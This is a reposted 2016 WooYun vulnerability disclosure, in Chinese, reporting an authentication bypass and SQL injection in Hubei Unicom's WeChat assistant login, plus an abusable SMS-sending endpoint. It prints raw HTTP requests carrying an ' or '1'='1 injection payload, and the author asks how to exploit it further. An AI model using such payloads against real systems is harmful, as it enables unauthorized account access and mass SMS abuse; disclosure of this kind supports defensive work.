湖北联通官方微信沃助手任意登录与2处SQL注入

admin
admin
admin
139585
文章
114
评论
2017年4月28日16:36:04评论316 views字数 250阅读0分50秒阅读模式
摘要

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

漏洞概要 关注数(3) 关注此漏洞

缺陷编号: WooYun-2016-204973

漏洞标题: 湖北联通官方微信沃助手任意登录与2处SQL注入

相关厂商: 湖北联通

漏洞作者: SoulHunter

提交时间: 2016-05-04 18:30

公开时间: 2016-06-20 17:40

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 字符类型注射 万能密码 oracle

0人收藏

漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

简要描述:

RT

详细说明:

问题出在这个地址:**.**.**.**:9988/

第一处是登录接口:

code 区域 
POST /userLogin.do?method=login HTTP/1.1
 Host: **.**.**.**:9988
 Proxy-Connection: keep-alive
 Content-Length: 83
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Origin: **.**.**.**:9988
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
 Content-Type: application/x-www-form-urlencoded
 Referer: **.**.**.**:9988/login.html?msg=%25E7%2594%25A8%25E6%2588%25B7%25E5%2590%258D%25E6%2588%2596%25E5%25AF%2586%25E7%25A0%2581%25E9%2594%2599%25E8%25AF%25AF%25EF%25BC%2581
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: JSESSIONID=B3C2A0D5A059FE7F19BCE2C0FD8E4370; email=13888888888; password=13888888888; isstorePwd=yes
 
 username=13888888888' or '1'='1&password=13888888888' or '1'='1

绕过验证

且存在sql注入问题。

第二处是:发送短信接口

code 区域 
POST /sellMain.do?method=sendmsg HTTP/1.1
 Host: **.**.**.**:9988
 Proxy-Connection: keep-alive
 Content-Length: 24
 Accept: text/plain, */*; q=0.01
 Origin: http://**.**.**.**:9988
 X-Requested-With: XMLHttpRequest
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Referer: http://**.**.**.**:9988/openOrder.html?id=8a5f82ca4f825e83014f82cd61440004&phone=
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: email=13339718222; password=111111; isstorePwd=no; JSESSIONID=2948C8DADD9D0F7FFD4B4FFC307A1800
 
 phone=13339718222

湖北联通官方微信沃助手任意登录与2处SQL注入

有没有大牛知道如何利用万能密码控制登录用户的。。我觉得应该可以做到。。求教!

漏洞证明:

湖北联通官方微信沃助手任意登录与2处SQL注入

湖北联通官方微信沃助手任意登录与2处SQL注入

湖北联通官方微信沃助手任意登录与2处SQL注入

湖北联通官方微信沃助手任意登录与2处SQL注入

然后可以利用短信接口给所有联通用户发流量包短信。。

修复方案:

过滤

版权声明:转载请注明来源 SoulHunter@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-06 17:30

厂商回复:

CNVD未复现所述情况,暂未列入处置流程。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin